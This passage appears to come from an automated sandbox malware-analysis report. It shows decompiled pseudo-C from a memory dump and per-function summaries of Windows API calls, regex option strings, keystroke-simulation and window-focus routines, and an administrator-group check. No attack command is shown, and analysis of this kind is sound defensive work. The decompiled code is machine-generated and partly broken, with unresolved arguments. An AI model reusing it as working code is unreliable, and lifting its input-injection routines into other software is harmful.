								_t281 = E00DD0DB6(_t280, 0, __eflags, 0x2000);
								_v104 = 1;
								_t338 = _t281;
								_v80 = 0xfff;
								_a12 = _t338;
								__eflags = 0 -  *((intOrPtr*)(_t370 + 0x94));
								_t186 = 0;
								while(1) {
									_a4 = _t186;
									_v96 = _t186;
									_push( &_v104);
									_push(0);
									_push(0x104b);
									_push( *(_t370 + 0x34));
									_v84 = _t338;
									if(__eflags >= 0) {
										break;
									}
									SendMessageW();
									_t189 = E00DD2BFC(_a12);
									_v80 = 0xffe;
									__eflags = 0xffe - _t189;
									if(0xffe - _t189 <= 0) {
										L26:
										return _t281;
									}
									_t292 =  &(_t281[E00DD2BFC(_t281)]);
									_t192 =  *0xe757c4; // 0x7c
									 *_t292 = _t192;
									_t292[1] = 0;
									_t194 = CharNextW(_t292);
									_t338 = _t194;
									_a12 = _t194;
									_t186 = _a4 + 1;
									__eflags = _t186 -  *((short*)(_t370 + 0x94));
								}
								SendMessageW();
								goto L26;
							}
							__eflags = _a12;
							if(__eflags == 0) {
								goto L81;
							}
							_v104 = 8;
							_v88 = 0xf000;
							_t198 = SendMessageW( *(_t370 + 0x34), 0x104b, 0,  &_v104);
							__eflags = _t198;
							if(_t198 == 0) {
								goto L90;
							}
							asm("sbb eax, eax");
							_t170 = ( ~((_v92 >> 0xc) - 1) & 0xfffffffd) + 4;
							goto L89;
						}
						__eflags = _t169 - 0x15;
						if(_t169 == 0x15) {
							__eflags = _t285[0x1f] - 4;
							if(_t285[0x1f] != 4) {
								_t170 = E00DB9B3C( &(_t285[0x1c]));
								goto L89;
							}
							_t282 =  &(_t285[0x1c]);
							E00DB9837(_t169,  &(_t285[0x1c]),  &(_t285[0x1c]));
							_t339 = 2;
							_t356 = E00DD0DB6(_t282, 0, __eflags,  ~(0 | __eflags > 0x00000000) | ( *((intOrPtr*)(_t282[2] + 4)) + 0x00000001) * _t339);
							E00DB9837(E00DB9837(_t209, _t282, _t282), _t282, _t282);
							E00DB454E(_t356,  *(_t282[2]),  *((intOrPtr*)(_t282[2] + 4)) + 1);
							return _t356;
						}
						__eflags = _t169 - 0x18;
						if(__eflags <= 0) {
							L72:
							_t214 = SendMessageW(_t368, 0xe, 0, 0);
							_t343 = 2;
							_t100 = _t214 + 1; // 0x1
							_t357 = _t100;
							_t372 = E00DD0DB6(_t280, _t357, __eflags,  ~(0 | __eflags > 0x00000000) | _t357 * _t343);
							GetWindowTextW(_a8, _t372, _t357);
							L13:
							return _t372;
						}
						__eflags = _t169 - 0x1a;
						if(_t169 <= 0x1a) {
							__eflags = _a12;
							_push(0);
							_push(0);
							if(__eflags == 0) {
								_t220 = SendMessageW(_t368, 0xf0, ??, ??);
								 *_t280 = _t220;
								__eflags = _t220;
								if(_t220 == 0) {
									 *_t280 = 4;
								}
								goto L90;
							}
							_t221 = SendMessageW(_t368, 0xe, ??, ??);
							_t345 = 2;
							_t89 = _t221 + 1; // 0x1
							_t373 = _t89;
							_t224 = E00DD0DB6(_t280, 0, __eflags,  ~(0 | __eflags > 0x00000000) | _t373 * _t345);
							_a12 = _t224;
							_t225 = GetWindowTextW(_a8, _t224, _t373);
							__eflags = _t225;
							if(_t225 != 0) {
								return _a12;
							}
							_push(_a12);
							 *_t280 = 0;
							L28:
							L00DD0E2C();
							goto L90;
						}
						__eflags = _t169 - 0x1c;
						if(__eflags != 0) {
							goto L72;
						}
						__eflags = SendMessageW(_t368, 0x1001, 0,  &_v120);
						if(__eflags == 0) {
							 *_t280 = 0;
							goto L90;
						}
						_t372 = E00DD0DB6(_t280, 0, __eflags, 0x16);
						wsprintfW(_t372, L"%d/%02d/%02d", _v120 & 0x0000ffff, _v118 & 0x0000ffff, _v114 & 0x0000ffff);
						goto L13;
					}
					if(__eflags == 0) {
						_v48 = _t285[4];
						 *_t280 = 0;
						_t233 = GetWindowLongW(_t285[0xd], 0xfffffff0);
						__eflags = _a12;
						_a4 = _t233;
						_v52 = 8;
						_v40 = 0xf000;
						if(__eflags == 0) {
							_t235 = SendMessageW( *(_v12 + 0x34), 0x113e, 0,  &_v52);
							__eflags = _t235;
							if(_t235 != 0) {
								_t321 = _v44;
								__eflags = _a4 & 0x00000100;
								if((_a4 & 0x00000100) != 0) {
									asm("sbb eax, eax");
									_t241 = ( ~((_t321 >> 0xc) - 1) & 0xfffffffd) + 4;
									__eflags = _t241;
									 *_t280 = _t241;
								}
								__eflags = _t321 & 0x00000002;
								if((_t321 & 0x00000002) != 0) {
									 *_t280 =  *_t280 | 0x00000100;
									__eflags =  *_t280;
								}
								__eflags = _t321 & 0x00000020;
								if((_t321 & 0x00000020) != 0) {
									 *_t280 =  *_t280 | 0x00000400;
									__eflags =  *_t280;
								}
								__eflags = _t321 & 0x00000010;
								if((_t321 & 0x00000010) != 0) {
									 *_t280 =  *_t280 | 0x00000200;
								}
							}
							goto L90;
						}
						_t281 = E00DD0DB6(_t280, 0, __eflags, 0x2000);
						_push( &_v52);
						_push(0);
						_push(0x113e);
						_push( *(_v12 + 0x34));
						L25:
						_v32 = 0xfff;
						_v36 = _t281;
						_v52 = 1;
						_t244 = SendMessageW(??, ??, ??, ??);
						__eflags = _t244;
						if(_t244 == 0) {
							_push(_t281);
							goto L28;
						}
						goto L26;
					}
					__eflags = _t169 - 0xa;
					if(__eflags > 0) {
						__eflags = _t169 - 0xc;
						if(_t169 == 0xc) {
							 *_t280 =  *_t280 & 0;
							goto L90;
						}
						__eflags = _t169 - 0xd;
						if(__eflags <= 0) {
							goto L72;
						}
						__eflags = _t169 - 0xf;
						if(_t169 <= 0xf) {
							__eflags = IsMenu(_t285[3]);
							if(__eflags == 0) {
								goto L90;
							}
							_t246 = E00DD0DB6(_t280, 0, __eflags, 0x208);
							__eflags = _a12;
							_t361 = _t246;
							_t376 = _v12;
							_a8 = _t361;
							_v200 = 0x30;
							_push( &_v200);
							if(_a12 == 0) {
								_v196 = 1;
								_t248 = GetMenuItemInfoW( *(_t376 + 0xc), _a4, 0, ??);
								_push(_t361);
								__eflags = _t248;
								if(_t248 == 0) {
									goto L28;
								}
								L00DD0E2C();
								_t325 = _v188;
								 *_t280 = _t325;
								asm("sbb eax, eax");
								_t255 = ( ~(_t325 & 0x00000003) & 0x00000040) + 0x40;
								__eflags = _t325 & 0x00008080;
								if((_t325 & 0x00008080) != 0) {
									_t255 = _t255 | 0x00000100;
									__eflags = _t255;
								}
								__eflags = _t325 & 0x00000008;
								if((_t325 & 0x00000008) == 0) {
									_t170 = _t255 | 0x00000004;
									__eflags = _t170;
								} else {
									_t170 = _t255 | 0x00000001;
								}
								__eflags = _t325 & 0x00001000;
								if((_t325 & 0x00001000) != 0) {
									_t170 = _t170 | 0x00000200;
								}
								goto L89;
							}
							_v164 = _t361;
							_v196 = 0x10;
							_v160 = 0x104;
							_t256 = GetMenuItemInfoW( *(_t376 + 0xc), _a4, 0, ??);
							__eflags = _t256;
							if(_t256 != 0) {
								return _a8;
							}
							_push(_a8);
							 *_t280 = 0;
							goto L28;
						}
						__eflags = _t169 - 0x10;
						if(__eflags != 0) {
							goto L72;
						}
						 *_t280 = 0;
						_t258 = SendMessageW(_t368, 0x110a, 9, 0);
						__eflags = _t258;
						if(_t258 == 0) {
							goto L90;
						}
						__eflags = _a12;
						_v48 = _t258;
						_v52 = 4;
						if(__eflags == 0) {
							_t260 = SendMessageW(_t368, 0x113e, 0,  &_v52);
							__eflags = _t260;
							if(_t260 == 0) {
								goto L90;
							}
							_t170 = _v16;
							goto L89;
						}
						_t281 = E00DD0DB6(_t280, 0, __eflags, 0x2000);
						_push( &_v52);
						_push(0);
						_push(0x113e);
						_push(_t368);
						goto L25;
					}
					if(__eflags == 0) {
						_t263 = SendMessageW(_t368, 0x130b, 0, 0);
						__eflags = _a12;
						 *_t280 = _t263;
						if(_a12 == 0) {
							goto L90;
						}
						_v152 = 8;
						SendMessageW(_t368, 0x133c, _t263,  &_v152);
						_t170 = _v128;
						goto L89;
					}
					_t265 = _t169;
					__eflags = _t265;
					if(_t265 == 0) {
						_t280 = SendMessageW(_t368, 0x147, 0, 0);
						__eflags = _t280 - 0xffffffff;
						if(__eflags == 0) {
							goto L72;
						}
						_t267 = SendMessageW(_t368, 0x149, _t280, 0);
						_t348 = 2;
						_t372 = E00DD0DB6(_t280, SendMessageW, __eflags,  ~(0 | __eflags > 0x00000000) | (_t267 + 0x00000001) * _t348);
						_push(_t372);
						_push(_t280);
						_push(0x148);
						L12:
						SendMessageW(_a8, ??, ??, ??);
						goto L13;
					}
					_t272 = _t265 - 1;
					__eflags = _t272;
					if(_t272 == 0) {
						_t280 = SendMessageW(_t368, 0x188, 0, 0);
						__eflags = _t280 - 0xffffffff;
						if(__eflags == 0) {
							goto L72;
						} else {
							_t274 = SendMessageW(_t368, 0x18a, _t280, 0);
							_t350 = 2;
							_t336 =  ~(__eflags > 0) | (_t274 + 0x00000001) * _t350;
							_t372 = E00DD0DB6(_t280, SendMessageW,  ~(__eflags > 0) | (_t274 + 0x00000001) * _t350, _t336);
							_push(_t372);
							_push(_t280);
							_push(0x189);
							goto L12;
						}
					}
					__eflags = _t272 - 7;
					if(__eflags != 0) {
						goto L72;
					} else {
						_push(0);
						_push(0);
						_push(0x408);
						goto L88;
					}
				} else {
					 *_a8 =  *_a8 & 0x00000000;
					L90:
					return 0;
				}
			}

0x00e37dfe
0x00e37e10
0x00e37e15
0x00e37e1b
0x00e37e1e
0x00e37e20
0x00e37e23
0x00e37e2a
0x00e37e2c
0x00e37e2f
0x00e37e32
0x00e3819f
0x00e381a2
0x00e384c6
0x00e384c8
0x00e384c9
0x00e384ca
0x00e384cf
0x00e384d0
0x00e384d6
0x00e384d6
0x00000000
0x00e384d6
0x00e381a8
0x00e381ab
0x00e38491
0x00e3849a
0x00e384a4
0x00e384aa
0x00e384bb
0x00e384bf
0x00e384c1
0x00000000
0x00e384c1
0x00e381b1
0x00e381b4
0x00e38334
0x00e38344
0x00e3834e
0x00e38359
0x00e3835c
0x00e38368
0x00e3837d
0x00e38383
0x00e38386
0x00e38389
0x00000000
0x00000000
0x00e3838f
0x00e38393
0x00e383da
0x00e383e4
0x00e383e6
0x00e383ee
0x00e383f0
0x00e383f9
0x00e383fc
0x00e38403
0x00e3845a
0x00e3845a
0x00e3845d
0x00e38463
0x00e38464
0x00e38465
0x00e3846a
0x00e3846d
0x00e38470
0x00000000
0x00000000
0x00e38407
0x00e38410
0x00e3841d
0x00e38420
0x00e38422
0x00e37fc9
0x00000000
0x00e37fc9
0x00e3842f
0x00e38432
0x00e38438
0x00e3843e
0x00e38442
0x00e3844f
0x00e38451
0x00e38457
0x00e38458
0x00e38458
0x00e38472
0x00000000
0x00e38472
0x00e38395
0x00e38399
0x00000000
0x00000000
0x00e3839e
0x00e383af
0x00e383b6
0x00e383bc
0x00e383be
0x00000000
0x00000000
0x00e383cd
0x00e383d2
0x00000000
0x00e383d2
0x00e381ba
0x00e381bd
0x00e382cd
0x00e382d1
0x00e3832a
0x00000000
0x00e3832a
0x00e382d3
0x00e382d8
0x00e382e4
0x00e382fb
0x00e3830a
0x00e3831a
0x00000000
0x00e38320
0x00e381c3
0x00e381c6
0x00e38296
0x00e3829b
0x00e382a5
0x00e382a6
0x00e382a6
0x00e382bc
0x00e382c2
0x00e37eb6
0x00000000
0x00e37eb6
0x00e381cc
0x00e381cf
0x00e38226
0x00e3822a
0x00e3822b
0x00e3822c
0x00e3827b
0x00e38281
0x00e38283
0x00e38285
0x00e3828b
0x00e3828b
0x00000000
0x00e38285
0x00e38231
0x00e3823b
0x00e3823c
0x00e3823c
0x00e3824b
0x00e38256
0x00e38259
0x00e3825f
0x00e38261
0x00000000
0x00e3826d
0x00e38263
0x00e38266
0x00e37fd1
0x00e37fd1
0x00000000
0x00e37fd6
0x00e381d1
0x00e381d4
0x00000000
0x00000000
0x00e381ed
0x00e381ef
0x00e3821d
0x00000000
0x00e3821d
0x00e381fc
0x00e3820f
0x00000000
0x00e38215
0x00e37e38
0x00e380f8
0x00e380fb
0x00e380fd
0x00e38103
0x00e38107
0x00e3810a
0x00e38111
0x00e38118
0x00e3814c
0x00e38152
0x00e38154
0x00e3815a
0x00e38162
0x00e38165
0x00e3816f
0x00e38174
0x00e38174
0x00e38177
0x00e38177
0x00e38179
0x00e3817c
0x00e3817e
0x00e3817e
0x00e3817e
0x00e38180
0x00e38183
0x00e38185
0x00e38185
0x00e38185
0x00e3818b
0x00e3818e
0x00e38194
0x00e38194
0x00e3818e
0x00000000
0x00e38154
0x00e38127
0x00e3812d
0x00e3812e
0x00e3812f
0x00e38134
0x00e37fae
0x00e37fae
0x00e37fb5
0x00e37fb8
0x00e37fbf
0x00e37fc5
0x00e37fc7
0x00e37fd0
0x00000000
0x00e37fd0
0x00000000
0x00e37fc7
0x00e37e3e
0x00e37e41
0x00e37f47
0x00e37f4a
0x00e380e7
0x00000000
0x00e380e7
0x00e37f50
0x00e37f53
0x00000000
0x00000000
0x00e37f59
0x00e37f5c
0x00e38006
0x00e38008
0x00000000
0x00000000
0x00e38013
0x00e38018
0x00e3801c
0x00e3801e
0x00e38028
0x00e3802b
0x00e38035
0x00e38036
0x00e3807c
0x00e38089
0x00e3808f
0x00e38090
0x00e38092
0x00000000
0x00000000
0x00e38098
0x00e3809e
0x00e380a8
0x00e380af
0x00e380b4
0x00e380b7
0x00e380bd
0x00e380bf
0x00e380bf
0x00e380bf
0x00e380c4
0x00e380c7
0x00e380ce
0x00e380ce
0x00e380c9
0x00e380c9
0x00e380c9
0x00e380d1
0x00e380d7
0x00e380dd
0x00e380dd
0x00000000
0x00e380d7
0x00e38038
0x00e38044
0x00e38051
0x00e3805b
0x00e38061
0x00e38063
0x00000000
0x00e3806f
0x00e38065
0x00e38068
0x00000000
0x00e38068
0x00e37f62
0x00e37f65
0x00000000
0x00000000
0x00e37f76
0x00e37f78
0x00e37f7e
0x00e37f80
0x00000000
0x00000000
0x00e37f86
0x00e37f8a
0x00e37f8d
0x00e37f94
0x00e37fe7
0x00e37fed
0x00e37fef
0x00000000
0x00000000
0x00e37ff5
0x00000000
0x00e37ff5
0x00e37fa1
0x00e37fa6
0x00e37fa7
0x00e37fa8
0x00e37fad
0x00000000
0x00e37fad
0x00e37e47
0x00e37f17
0x00e37f19
0x00e37f1d
0x00e37f1f
0x00000000
0x00000000
0x00e37f2b
0x00e37f3d
0x00e37f3f
0x00000000
0x00e37f3f
0x00e37e4d
0x00e37e4d
0x00e37e4f
0x00e37ecb
0x00e37ecd
0x00e37ed0
0x00000000
0x00000000
0x00e37ee4
0x00e37eeb
0x00e37efc
0x00e37efe
0x00e37eff
0x00e37f00
0x00e37eb1
0x00e37eb4
0x00000000
0x00e37eb4
0x00e37e51
0x00e37e51
0x00e37e52
0x00e37e77
0x00e37e79
0x00e37e7c
0x00000000
0x00e37e82
0x00e37e90
0x00e37e97
0x00e37e9f
0x00e37ea8
0x00e37eaa
0x00e37eab
0x00e37eac
0x00000000
0x00e37eac
0x00e37e7c
0x00e37e54
0x00e37e57
0x00000000
0x00e37e5d
0x00e37e5d
0x00e37e5e
0x00e37e5f
0x00000000
0x00e37e5f
0x00e37e00
0x00e37e03
0x00e384d8
0x00000000
0x00e384d8

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E384D0

Strings

%d/%02d/%02d, xrefs: 00E38209

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: b13f0b19b3959b9b00fc1dbe7ac4e3723743df841ef93f81aff93d9f68839c17
Instruction ID: 388769dd19eb1878d1cdf3bc0ca9176f2d1d0f42c1914b9595972249b65a6cd1
Opcode Fuzzy Hash: b13f0b19b3959b9b00fc1dbe7ac4e3723743df841ef93f81aff93d9f68839c17
Instruction Fuzzy Hash: D112CC71A00309AFEB249F25CE4DFAB7FF8EB45314F10512AF915BA2A1DB709945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DC6F9E, Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DC71C3
_memset.LIBCMT ref: 00DC7539
_memmove.LIBCMT ref: 00DC76AC

Strings

P\, xrefs: 00E01AB8
\b(?=\w), xrefs: 00E03769
], xrefs: 00E01A22
[:>:]], xrefs: 00DC7492
\b(?<=\w), xrefs: 00E03773
DEFINE, xrefs: 00E02103
Q\E, xrefs: 00DC7FCB
[:<:]], xrefs: 00DC7479

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memmove$_memset
String ID: ]$DEFINE$P\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-2476006638
Opcode ID: 390b22d32359a572dfffa704c629548a5e286092e91606f745590faf955c8a36
Instruction ID: fd6681a22a9071bda924b0c640d4e7ed2e8502d398b5ead7efd185b21d9c8775
Opcode Fuzzy Hash: 390b22d32359a572dfffa704c629548a5e286092e91606f745590faf955c8a36
Instruction Fuzzy Hash: 52939075A04216DBDB24CFA8C881BADB7B1FF48314F24916AE955BB2C1E7709EC1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00DB48D7, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00DB48DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DED665
IsIconic.USER32 ref: 00DED66E
ShowWindow.USER32(?,00000009), ref: 00DED67B
SetForegroundWindow.USER32(?), ref: 00DED685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DED69B
GetCurrentThreadId.KERNEL32 ref: 00DED6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00DED6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00DED6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00DED6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00DED6CF
SetForegroundWindow.USER32(?), ref: 00DED6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED6E7
keybd_event.USER32 ref: 00DED6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED6FC
keybd_event.USER32 ref: 00DED701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED70A
keybd_event.USER32 ref: 00DED70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED719
keybd_event.USER32 ref: 00DED71E
SetForegroundWindow.USER32(?), ref: 00DED721
AttachThreadInput.USER32(?,?,00000000), ref: 00DED748

Strings

Shell_TrayWnd, xrefs: 00DED660

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 1bd34eb3c9afef9cc90f16f8f48590d98a7f856c3cd4048e33e1aeb36ab2c49e
Instruction ID: 1b9550fafbe2ef64e03949d8b642a1626669547c6a05e747b5297f92d219af94
Opcode Fuzzy Hash: 1bd34eb3c9afef9cc90f16f8f48590d98a7f856c3cd4048e33e1aeb36ab2c49e
Instruction Fuzzy Hash: 14316271A4035CBFEB216B629C4AF7F7E6DEB44B50F104025FA05FA1D1CAB09D01AAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC66E1, Relevance: 23.4, Strings: 18, Instructions: 889COMMON

Download Yara Rule

Strings

ANYCRLF), xrefs: 00E012FB
BSR_UNICODE), xrefs: 00E01338
LIMIT_MATCH=, xrefs: 00E01170
pG, xrefs: 00DC6751
CR), xrefs: 00E01287
UCP), xrefs: 00E0110D
CRLF), xrefs: 00E012C1
NO_AUTO_POSSESS), xrefs: 00E0112E
LIMIT_RECURSION=, xrefs: 00E011FC
ANY), xrefs: 00E012DE
LF), xrefs: 00E012A4
0D, xrefs: 00DC6733
UTF16), xrefs: 00E010CF
0E, xrefs: 00DC673D
UTF), xrefs: 00E010FA
0F, xrefs: 00DC6747
BSR_ANYCRLF), xrefs: 00E0131E
NO_START_OPT), xrefs: 00E0114F

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0D$0E$0F$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG
API String ID: 0-2078232363
Opcode ID: 0ebc9ca55ab3c01675b68e81f3901ee8c2529a50873429fcb0a59d3a447153b1
Instruction ID: 5039a62c7e5356312d0208090b52e631292f7b68a83c1d2d27c001efdaf1d9f5
Opcode Fuzzy Hash: 0ebc9ca55ab3c01675b68e81f3901ee8c2529a50873429fcb0a59d3a447153b1
Instruction Fuzzy Hash: 52725E75E0021A9BDB14CF59D880BAEB7B5FF44314F1491AAE849FB291E734DD81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1287, Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00DB19FA
GetSysColor.USER32(0000000F), ref: 00DB1A4E
SetBkColor.GDI32(?,00000000), ref: 00DB1A61

Part of subcall function 00DB1290: DefDlgProcW.USER32(?,00000020,?), ref: 00DB12D8

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: bf29e2b1a3c5892de99306abc712c4be7a4ff013e448971c5bb30e6b7643be3f
Instruction ID: 47e490dc720221c713c7bdc9502cd8f698ea88e4127945f6adf0e1dcab79ad40
Opcode Fuzzy Hash: bf29e2b1a3c5892de99306abc712c4be7a4ff013e448971c5bb30e6b7643be3f
Instruction Fuzzy Hash: 85A13A75102585FEEA28AB2A5C6DEFF399CDB42351FA8011EF543E5192CA10FD02D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2344, Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?,?,00E757B0,?,00E757B0,00E757B0,?,00DB1283,00000000,00000002,00000000), ref: 00DB2357
ScreenToClient.USER32 ref: 00DB2374
GetAsyncKeyState.USER32(00000001), ref: 00DB2399
GetAsyncKeyState.USER32(00000002), ref: 00DB23A7

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 3e71baccb2254c8af5219954cb02364f28ed5492f8af217d74975c14ce7bac6f
Instruction ID: 759cfd1c93b7b36d5323d238674489f36f502dcb2c77fb86df3661194155673f
Opcode Fuzzy Hash: 3e71baccb2254c8af5219954cb02364f28ed5492f8af217d74975c14ce7bac6f
Instruction Fuzzy Hash: 81417335904109FFCF159F69CC48AE9BBB4FB05360F24431AF869A22A0C735AD54DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4B37, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00DB4AD0,?,00000000), ref: 00DB4B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DB4B57

Strings

kernel32.dll, xrefs: 00DB4B40
GetNativeSystemInfo, xrefs: 00DB4B51

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 5c472c6848a3d7196948614f5c32314c745c3fa319a70cc0c7d68673d4fe195d
Instruction ID: 5e7cd892b47fb8afd7951b49946d0783ba24afee60006df377fe1074de672e3a
Opcode Fuzzy Hash: 5c472c6848a3d7196948614f5c32314c745c3fa319a70cc0c7d68673d4fe195d
Instruction Fuzzy Hash: 1BD01274E10717CFDB20DF32E81CB46BAD4AF05351F158839D486E6161D770D480C668

Uniqueness

Uniqueness Score: -1.00%

Function 00E0874B, Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E08774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E0878B
FreeSid.ADVAPI32(?), ref: 00E0879B

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: ba9f5691e5ef8f980ab9d132decce3d53c6d7fa3a7bf981663181a1dcc2eb84b
Instruction ID: 6863aeb44c43babc869aa984b9101859d66f122cabf2459154f95c411d341ed8
Opcode Fuzzy Hash: ba9f5691e5ef8f980ab9d132decce3d53c6d7fa3a7bf981663181a1dcc2eb84b
Instruction Fuzzy Hash: 1CF04975E1130CBFDF04DFF4DD89AAEBBBCEF08201F1044A9E905E2181E6716A488B50

Uniqueness

Uniqueness Score: -1.00%

Function 00E1445A, Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00DEE398), ref: 00E1446A
FindFirstFileW.KERNEL32(?,?), ref: 00E1447B
FindClose.KERNEL32(00000000), ref: 00E1448B

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
